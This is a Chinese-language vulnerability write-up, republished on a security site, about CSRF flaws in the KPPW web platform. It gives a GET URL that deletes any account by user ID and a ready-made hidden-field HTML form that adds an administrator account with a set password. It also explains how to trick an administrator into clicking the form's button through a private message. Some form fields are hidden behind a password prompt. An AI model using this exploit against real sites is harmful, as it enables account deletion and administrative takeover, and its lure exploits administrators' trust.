KPPW最新版本(Csrf删除任意帐号/添加管理员)

2020年1月1日03:53:46评论354 views字数 1367阅读4分33秒阅读模式

摘要

浅蓝http://localhost/KPPW/index.php?do=user&view=message&op=sendhttp://localhost/KPPW/index.php?do=pubtask&id=1&step=step2

漏洞作者：

浅蓝

详细说明：

http://localhost/KPPW/index.php?do=user&view=message&op=send

http://localhost/KPPW/index.php?do=pubtask&id=1&step=step2

收件人填目标用户名

标题随便

内容没有转义

不过过滤了敏感标签和 onerror onload等事件。

先来看第一个删除任意帐号

http://localhost/KPPW/admin/index.php?do=user&view=list&op=del&edituid=5529

GET提交此URL 就会删除ID为 “5529”的用户

接着是添加管理员

在添加用户处抓包

提交数据为

edituid=&fds[username]=qianlan&fds[truename]=&fds[phone]=&fds[qq]=&fds[indus_pid]=&fds[indus_id]=&fds[birthday]=&fds
		
			输入密码查看隐藏内容
			
				
				
			
		
=111111&fds[email][email protected]&fds[group_id]=1&is_submit=1

现在来构造一个表单

<form action="http://localhost/KPPW/admin/index.php?do=user&view=add&edituid= " method="post">  <input type=hidden name="edituid" value="">  <input type=hidden name="fds[username]" value="qianlan">  <input type=hidden name="fds[truename]" value="">  <input type=hidden name="fds[phone]" value="">  <input type=hidden name="fds[qq]" value="">  <input type=hidden name="fds[indus_pid]" value="">  <input type=hidden name="fds[indus_id]" value="">  <input type=hidden name="fds[birthday]" value="">  <input type=hidden name="fds
		
			输入密码查看隐藏内容
			
				
				
			
		
" value="123456">  <input type=hidden name="fds[email]" value="[email protected]">  <input type=hidden name="fds[group_id]" value="1">  <input type="submit" name="is_submit" value="1"> </form>

其他比较敏感的都隐藏起来。因为script 标签被过滤。不能自动提交。

所以放出来个按钮，发给人家一看一个按钮是谁都会有好奇心肯定会点下这个按钮。

将此发给管理员。就坐等添加新帐号吧，或者可以不用写表单，嵌入其他URL，还可以自动提交。此处自由发挥

现在来用小号给管理员发个私信

现在来看看效果，出来一个小按钮接着点击。

我们现在来后台的会员管理看看是否添加了一个名为qianlan的管理员

添加成功，用户组为管理员

帐号qianlan 密码 123456

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究，若将其信息做其他用途，由用户承担全部法律及连带责任，本站不承担任何法律及连带责任，请遵守中华人民共和国安全法.

我的微信
微信扫一扫

我的微信公众号
微信扫一扫

KPPW最新版本(Csrf删除任意帐号/添加管理员)

漏洞作者：

详细说明：

微擎普通用户权限SQL注入漏洞

无需登录-悟空CRM 存储型XSS

cacti 0.8.8g cdef.php selected_items 存在sql注入

ZwelL通用图片上传漏洞

discuz某插件设计缺陷可前台getshell

Seacmsv6.25 two sql inject

深信服数据中心2.0某处存在命令执行漏洞

Z-blog前台无需登录包含漏洞一枚

发表评论

在线咨询

微信